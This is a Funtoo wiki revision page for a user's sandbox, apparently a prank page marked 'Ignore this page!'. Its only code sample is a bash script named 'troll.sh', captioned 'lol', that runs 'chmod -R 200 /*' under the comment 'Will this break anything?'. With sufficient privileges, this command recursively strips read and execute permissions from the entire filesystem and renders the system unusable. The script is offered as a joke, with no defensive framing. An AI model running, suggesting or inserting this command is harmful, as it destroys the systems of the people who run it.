Difference between revisions of "User:Court-jester"

From Funtoo
Jump to navigation Jump to search
(Created page with "== Page under construction == Ignore this page! === Code samples === {{file|name=troll.sh|lang=bash|desc=lol|body= #!/bin/bash # Will this break anything? chmod -R 200 /* }}")
 
Line 9: Line 9:
chmod -R 200 /*
chmod -R 200 /*
}}
}}
[[User:Court-jester/Bio|Bio]]

Revision as of 19:43, February 25, 2022

Page under construction

Ignore this page!

Code samples

   troll.sh (bash source code) - lol
#!/bin/bash

# Will this break anything?
chmod -R 200 /*


Bio